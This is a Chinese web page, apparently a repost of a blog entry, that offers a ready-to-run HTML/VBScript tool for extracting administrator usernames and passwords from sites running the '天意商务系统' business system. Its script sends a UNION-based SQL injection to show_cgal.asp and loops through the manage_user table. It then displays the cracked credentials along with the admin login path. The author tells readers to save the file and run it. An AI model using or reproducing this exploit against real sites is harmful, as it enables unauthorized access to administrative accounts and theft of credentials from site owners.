页面导航：首页 → 网络编程 → 黑客相关 → 正文内容

天意商务系统后台管理帐号破解html版

发布：dxy 字体：[增加减小] 类型：转载

/**
慈勤强
http://blog.csdn.net/cqq
*/
自从上次写了个天意商务系统破解程序之后，
收到了不少朋友的来信，
有询问程序原理的，有询问如何防护的。
今天，我抽了一点时间，做了这个Html版，就只有这一个htm文件
相信有点html知识和SQL Injection知识的朋友都能够看懂
原理非常简单，破解用户帐号是用的SQL Injection方法，
因为这套系统好多地方存在sql injection漏洞，
然后自己下载个这套系统，就可以很方便的找出问题了。
以前是Vc++版本，现在是html版本，不过都是一样，
就是通过http协议取得网页的源文件
然后分析源文件，找到用户名和密码
并且显示出来。
下面是源代码，大家只要把这个文件保存到硬盘上，起名叫ty.htm，就可以了。

点击运行可以看到效果:

<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"> 
<title>天意商务系统后台管理帐号破解html版--慈勤强制作</title> 
<SCRIPT Language = "VbScript"> 
Function bytes2BSTR(vIn) 
strReturn = "" 
For i = 1 To LenB(vIn) 
  ThisCharCode = AscB(MidB(vIn,i,1)) 
  If ThisCharCode < &H80 Then 
   strReturn = strReturn & Chr(ThisCharCode) 
  Else 
   NextCharCode = AscB(MidB(vIn,i+1,1)) 
   strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 
   i = i + 1 
  End If 
Next 
bytes2BSTR = strReturn 
End Function 
Sub OpenUrl(strUrl)  
   
    strTmp = "" 
strUser = "!" 
strAAA ="" 
strCqq="" 
i=0 
on Error Resume Next 
While Trim(strUser) <> "" 
     strPara = "/wlyx/show_cgal.asp?newsid=1%20and%201=2%20union%20select%201,username%2b'***'%2bpassword,3,4,5,6%20from%20manage_user%20where%20username>'" + strUser + "'%20union%20select%20*%20from%20cgal%20where%201=2" 
    Set xmlhttp = CreateObject("Microsoft.XMLHTTP") 
     xmlhttp.open "GET",(strUrl + strPara),false 
     xmlhttp.send      
  strAAA=getMid(bytes2BSTR(xmlhttp.ResponseBody), "<title>", "</title>") 
  If Trim(strAAA) <> "" Then 
         arr = Split(strAAA, "***") 
         strUser = arr(0) 
         strCqq = strCqq + vbNewLine + "用户名：" + strUser + vbNewLine + "密  码：" + arr(1) + vbNewLine + vbNewLine 
     Else 
         strUser = "" 
     End If 
   
   //msgbox xmlhttp.Response 
     Set xmlhttp = Nothing 
Wend 
If strCqq<>"" Then 
  strCqq="破解的后台管理帐号为：（后台默认地址："+strUrl+"/admin）"+vbCrLF+VBCRLF+strCqq+vbnewline 
     cqqadmin.innerText=strCqq 
Else 
  cqqadmin.innerText="出错" 
End If 
     
End Sub    
Function getMid(str, str1, str2) 
    str11 = "" 
    i = InStr(str, str1) 
    If i > 0 Then 
        j = InStr(i, str, str2) 
        If j > 0 Then 
            str11 = Mid(str, i + Len(str1), j - i - Len(str1))         
        End If     
    End If     
    getMid = str11 
End Function 
</script> 
<style type="text/css"> 
 
</style></head> 
<body>

<table width="600" border="1" align="center" cellpadding="2" cellspacing="0" bordercolor="#D4D4D4" bgcolor="#E4E4E4"> 
  <tr> 
    <td width="39%">天意商务系统后台管理帐号破解html版</td> 
    <td align="right">Powered By Steven_Cee <a href="Http://blog.csdn.net/cqq" target="_blank">Http://blog.csdn.net/cqq</a> </td> 
  </tr> 
</table>

[Ctrl+A 全选提示:你可先修改部分代码,再按运行]

Tags：天意商务系统后台管理帐号破解html版

百度中搜索更多的关于天意商务系统后台管理帐号破解html版内容，或者用Google搜索相关更多

浏览次数：载入中... 打印本文关闭本文返回首页

顶一下

文章评论

共有位脚本之家网友发表了评论我来说两句

天意商务系统后台管理帐号破解html版

文章评论

同类文章

最近更新

热点排行

天意商务系统后台管理帐号破解html版

文章评论

同 类 文 章

最 近 更 新

热 点 排 行

同类文章

最近更新

热点排行